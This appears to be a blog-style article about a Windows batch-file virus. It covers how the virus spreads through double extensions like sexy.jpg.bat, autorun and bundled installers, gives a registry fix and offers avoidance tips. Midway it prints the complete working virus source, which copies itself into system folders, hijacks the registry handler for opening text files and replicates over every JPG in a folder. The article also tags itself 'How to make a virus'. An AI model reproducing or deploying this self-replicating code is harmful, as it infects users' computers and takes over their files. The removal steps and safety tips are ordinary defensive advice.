
BAT Virus and how to handle it

Maybe you still remember a few years ago, there are viruses that can duplicate itself by using a file extension. One of computer virus type is a virus made from Batch files. During the batch file can still operate on the Operating System, so this type of file can still be used for bad purposes.

Basically the contents of the batch file is a sequence of DOS commands, where to make those commands you can use NOTEPAD only. Simple, isn't it? But do not ever shrugged it, because for those of you who ever been victims of this virus has already know what the effects of this virus.

This virus working use double extensions, when clicked it will copy itself using file names with extension JPG (image file) which are in the same folder location. An example is, if in the same folder there is a file named sexy.jpg, then the batch file will copy itself to create a new file named sexy.jpg.bat.

Besides able to make itself similar to files with extension JPG, this virus also will duplicate itself as files with extension TXT.

The techniques used by this virus to infect every file are using the file with extension TXT. If there is in the folder the file with extension TXT and we open it, then the virus will automatically go into that folder.

1 @Echo off
2 If not Exist C:\DOCUME~1\ALLUSE~1\DOCUME~1\Readme.bat Copy %0 C:\DOCUME~1\ALLUSE~1\DOCUME~1\Readme.bat >Null
If not Exist C:\DOCUME~1\ALLUSE~1\STARTM~1\Programs\Startup\message.wri
Goto message
4 Goto Infect
6 :message
7 Echo You are under attack! >message.wri
8 Echo Your PC no longer safe. >>message.wri
9 Echo It's time to lay eggs and breed. >>message.wri
10 Copy message.wri C:\DOCUME~1\ALLUSE~1\STARTM~1\Programs\Startup\message.wri >Null
12 Echo Windows Registry Editor Version 5.00 >Infect.reg
13 Echo. >>Infect.reg
14 Echo [HKEY_CLASSES_ROOT\txtfile\shell\open\command] >>Infect.reg
15 Echo @=hex(2) :43, 00, 3a, 00, 5c, 00, 44, 00, 6f, 00, 63, 00, 75, 00, 6d, 00, 65, 00, 6e, 00, 74, 00, 73, \ >>Infect.reg
16 Echo 00, 20, 00, 61, 00, 6e, 00, 64, 00, 20, 00, 53, 00, 65, 00, 74, 00, 74, 00, 69, 00, 6e, 00, 67, 00, \ >>Infect.reg
17 Echo 73, 00, 5c, 00, 41, 00, 6c, 00, 6c, 00, 20, 00, 55, 00, 73, 00, 65, 00, 72, 00, 73, 00, 5c, 00, 44, \ >>Infect.reg
18 Echo 00, 6f, 00, 63, 00, 75, 00, 6d, 00, 65, 00, 6e, 00, 74, 00, 73, 00, 5c, 00, 52, 00, 65, 00, 61, 00, \ >>Infect.reg
19 Echo 64, 00, 6d, 00, 65, 00, 2e, 00, 62, 00, 61, 00, 74, 00, 20, 00, 25, 00, 31, 00, 00, 00 >>Infect.reg
21 Copy Infect.reg c:\DOCUME~1\ALLUSE~1\DOCUME~1\Infect.reg >Null
22 C:\DOCUME~1\ALLUSE~1\DOCUME~1\Infect.reg
23 @Del Infect.reg
24 @Del C:\DOCUME~1\ALLUSE~1\DOCUME~1\Infect.reg
26 :Infect
27 Start %SystemRoot%\system32\NOTEPAD.EXE %1
28 Copy %0 %1.bat >Null
29 For %%A in (*.Jpg) do type %0 >%%A.bat
30 @Del null
31 Exit

Above is the DOS command contained in the BAT file that serves as a virus.

How is the beginning of a virus can infect our computer?
Internet is like land mines, if we are not careful then we can become the victims. The origin of the virus spread begin from the internet, then continues offline from one PC to another PC with a USB flash drive using autorun script. The method of infection is as follows:

1. With the method of disguise.
To carry out the action, the BAT file created has double file extension. The file name is made as attractive as possible so that the victim was curious and clicked on the file (example: sexy.jpg.bat). BAT extension will not be visible when the "Hide extensions for known file types = true" in the settings "folder options". Victims of this method are usually the peoples who do not understand about file extension.

2. Inserted in the setup file or application.
Virus makers are now very careful, they play very neat. The number 1 spread method is very risky, because people are now very careful when clicking a suspicious file. They used a method with insert the virus in the setup file. When the setup file or an application is executed, the virus spread so easily can run smoothly.

What are the signs my PC was infected with a virus of this type?
If your PC has been infected with this virus type, then your hard disk space is reduced drastically due to swelling of the files that are not reasonable.

What should I do to fix it?
Run REGEDIT, go to HKEY_CLASSES_ROOT\txtfile\shell\open\command
change its value as before to %SystemRoot%\system32\NOTEPAD.EXE %1

Tips to avoid the virus:
1. Turn off "autorun" service on your PC (For CD / DVD ROM, USB Flash and Hard disk).
2. Do not install the setup files from untrusted sources.
3. Do not click or execute on suspicious files.

Other suggestions:
If your PC feels heavy when running an application, you should uninstall it.

Keyword: Virus | Example of Virus | How to handle the virus | How to make a virus | Tips to avoid the virus